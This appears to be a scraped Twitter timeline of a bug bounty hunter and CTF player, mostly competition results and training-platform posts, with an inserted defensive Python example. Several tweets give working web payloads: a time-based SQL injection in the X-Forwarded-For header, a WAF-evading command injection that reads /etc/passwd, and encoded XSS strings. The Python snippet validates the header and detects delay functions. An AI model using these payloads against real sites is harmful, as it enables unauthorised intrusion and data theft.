I found 2 blind time-based SQL injections in the X-Forwarded-For: header just using Burp Intruder. Made a list of 500+ HTTP requests and tested them one by one for 3+ hours; here is the result:
X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z
#BugBounty
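A defensive counterpart to the report above, added here as an example that is not from the tweet or its author: it treats X-Forwarded-For as untrusted input (accepting only an IP literal before the value reaches a parameterised query) and flags log lines whose header value carries a time-delay SQL function, run over constructed sample log lines. The `xff="..."` log field format, the function names and the `logins` table are assumptions.

```python
import ipaddress
import re
import sqlite3

# Constructed sample access-log lines (not from the original tweet). The last one
# carries the time-based payload quoted in the tweet in its X-Forwarded-For header.
SAMPLE_LOGS = [
    '10.0.0.5 - - "GET /profile HTTP/1.1" 200 xff="203.0.113.7"',
    '10.0.0.5 - - "GET /profile HTTP/1.1" 200 xff="198.51.100.2, 203.0.113.7"',
    '10.0.0.9 - - "GET /profile HTTP/1.1" 200 xff="0\'XOR(if(now()=sysdate(),sleep(6),0))XOR\'Z"',
]

# Delay functions used by time-based injection across common database engines.
TIME_BASED_SQLI = re.compile(r"\b(sleep|benchmark|pg_sleep|waitfor)\s*\(", re.IGNORECASE)
XFF_FIELD = re.compile(r'xff="([^"]*)"')  # assumed log field layout


def first_hop_ip(xff_value):
    """Return the first X-Forwarded-For entry if it is a valid IP literal, else None.
    Rejecting anything that is not an IP is the cheapest fix: the injection
    string never reaches the query layer at all."""
    first = xff_value.split(",")[0].strip()
    try:
        return str(ipaddress.ip_address(first))
    except ValueError:
        return None


def suspicious_xff_lines(lines):
    """Return the X-Forwarded-For values from log lines that are not an IP
    literal or that contain a time-delay SQL function."""
    hits = []
    for line in lines:
        m = XFF_FIELD.search(line)
        if not m:
            continue
        value = m.group(1)
        if first_hop_ip(value) is None or TIME_BASED_SQLI.search(value):
            hits.append(value)
    return hits


def record_login(conn, user_id, xff_value):
    """Store the client IP with a parameterised query: the header value is bound
    as data, never concatenated into SQL text, and rejected unless it is an IP."""
    ip = first_hop_ip(xff_value)
    if ip is None:
        raise ValueError("X-Forwarded-For is not an IP address")
    conn.execute("INSERT INTO logins(user_id, ip) VALUES (?, ?)", (user_id, ip))
    return ip


def demo():
    """Constructed in-memory database showing the safe path end to end."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE logins(user_id INTEGER, ip TEXT)")
    record_login(conn, 1, "198.51.100.2, 203.0.113.7")
    return conn.execute("SELECT ip FROM logins").fetchone()[0]
```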
MD. GOLLAM RABBI
@n1ghtmar3_2421
Hey. It's me. Orin. I am a medical student, a Bug Bounty Hunter and a CTF Player
Science & Technology. Joined December 2020
MD. GOLLAM RABBI’s Tweets
Another 3 got triaged in a night. Keep digging deep, boys. And your methodology rocks 🔥
Hey guys. I just became champion of HackerOne Bug Hunt 2023
Quote Tweet
We want to congratulate @n1ghtmar3_2421 for standing on the Champion position of HackerOne Bug Hunt 2023 competition, also Congratulations to @Osrafi2 & @0x_saikat for securing the First Runner up & Second Runner up position Respectively!
Me and the Boys 🔥
Quote Tweet
Seized prizes of Cyberdrill 2021 by Our Federal_Bonk_Investigations ( @fbictf ) Members.
Thank you, , for choosing to support #BugHunt2023 as our "Powered by" sponsor! We are thrilled to have your company on board and look forward to working together to make this event a success.
Quote Tweet
Congratulations to IUT Genesis, Bonk_Police & Cyber Security Enthusiasts, for taking over the first, second & third place respectively in RIoT Center Flag Hunt 2022.
It was really nice playing #NahamCon2022 CTF w/ The Team
The improvement was great from the last year.
Kudos to all other players 🥳.
Alhamdulillah🥰
We captured the 3rd position in CTF.
Great experience w/ The Team
The progress is getting better day by day🥳
I conquered 2021 with Federal_Bonk_Investigations. We solved 12 challenges! duc.tf/c/jRbp #ductf2021
Regular expressions - I have just completed this room! Check it out: tryhackme.com/room/catregex #tryhackme #regular expressions #regex #bash #terminal #grep #catregex via
Our team, #Federal_Bonk_Investigations (also known as #Bonk_Police), got ranked 64th in CTF.
#defcon29 #no_horny
relatable enough?
Hello,
If you are just getting started into bug bounties and can't find enough resources, this thread might help you to find a way 👇
I just pwned USB Ripper in Hack The Box! hackthebox.eu/achievement/ch #hackthebox #htb #cybersecurity
Saw and fought on KOTH and spammed each other with /dev/urandom and BoOm! Got hooked. Started practicing as much as I could. It is really fun and helped me practice for CTF challenges.
Quote Tweet
Half a million people are learning cyber security on TryHackMe!
Retweet this & let us know why you signed up to TryHackMe. 5 random answers get $100 worth of Swag/Vouchers/Prizes
Thank YOU for supporting us!
250k of you signed up in the last 6 months: blog.tryhackme.com/there-are-half
For Business Reasons - I have just completed this room!
Check it out: tryhackme.com/room/forbusine #tryhackme #pivot #docker #ctf #realistic #web #network #privesc #linux #challenge #wordpress #forbusinessreasons via
If you've found an OS command injection with a WAF enabled, and special characters like (/"'&|()-;:.,`) and whitespace are blocked, try this method to bypass it.
-
E.g.: reading /etc/passwd file:
cat$IFS$9${PWD%%[a-z]*}e*c${PWD%%[a-z]*}p?ss??
-
Credit: Aysar Harb
-
#cybersecurity #pentesting
XSS in ASP pages, reflected inside a span, with < blocked.
Payloads:
%u003Csvg onload=alert(1)>
%u3008svg onload=alert(2)>
%uFF1Csvg onload=alert(3)>
#bugbounty #bugbountytips
🎉Giving away one subscription for
♥️♥️ ♥️♥️
Will select a random person from the retweets.
P.S. You don't have to follow me to participate in the giveaway. The winner will be selected randomly.
🎉🎉🎉Giving away one
subscription valid for
🔥🔥 3 months 🔥🔥
Will select a random person from the retweets.
Thanks to the person who gave it to me to share with the community 🙏
1/ WIN A SUBSCRIPTION TO YOUR FAVOURITE HACKING LEARNING PLATFORM
tinyurl.com/4wey55cm
Alhamdulillah, got my first account takeover vulnerability triaged on Bugcrowd. Thanks for this amazing talk on youtube.com/watch?v=0QFByA . Took notes of one P4 and one P5 as suggested in the video, chained them with XSS and got a one-click full account takeover.
My API Security Checklist, still researching, will update over time.
#BugBounty #BugBountyTip #BugBountyTips #InfoSec
EnterPrize - I have just completed this room! Check it out: tryhackme.com/room/enterprize #tryhackme #enumeration #web #real #enterprize via